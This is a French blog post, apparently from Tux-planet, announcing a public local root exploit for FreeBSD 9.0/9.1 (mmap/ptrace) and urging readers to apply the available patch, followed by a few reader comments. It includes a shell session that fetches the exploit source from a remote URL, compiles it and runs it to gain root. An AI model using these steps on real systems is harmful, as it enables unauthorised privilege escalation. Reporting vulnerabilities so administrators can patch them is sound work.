Local Root Exploit : bon anniverssaire FreeBSD !!!
Ça ressemble à un énorme troll tellement la coïncidence était improbable. FreeBSD vient de fêter ses 20 ans d'existence et pour célébrer cet événement, un certain Hunger, a décidé de rendre publique une faille de type "Local Root Exploit". Cette dernière permet de passer super administrateur sur une FreeBSD 9.1, sans en avoir les privilèges.
Voici un exemple de compromission :
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
root () farrell cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ fetch www.tux-planet.fr/public/hack/exploits/kernel/fbsd9lul.c
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <fbsd9lul () hunger hu>
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
Un patch est bien entendu déjà disponible. Pensez à mettre à jour vos système.
Happy Birthday to me, happy birthday to me, happy birthday dear me, happy birthday to me. - 20 years and still running strong.
— FreeBSD Project (@freebsd) June 19, 2013
Créé en 2005, Tux-planet est un site qui a pour ambition de regrouper des articles sur Linux et le monde des logiciels libres. 
3 Commentaires pour "Local Root Exploit : bon anniverssaire FreeBSD !!!"
Flux des commentaires de cet article Ajouter un commentairepfSense impacté ?
Puissant le ptrace. Cette faille est aussi dispo sur le kernel 9.0 d'après les commentaires de l'auteur.
@Mr Xhark: Il faut vraiment être en local pour pouvoir utiliser cette faille.
Patché ?
Merci beaucoup pour l'information merveilleuse.C'est vraiment important pour moi.Je suis à la recherche ce type d'informations depuis un certain temps et il a finalement obtenu.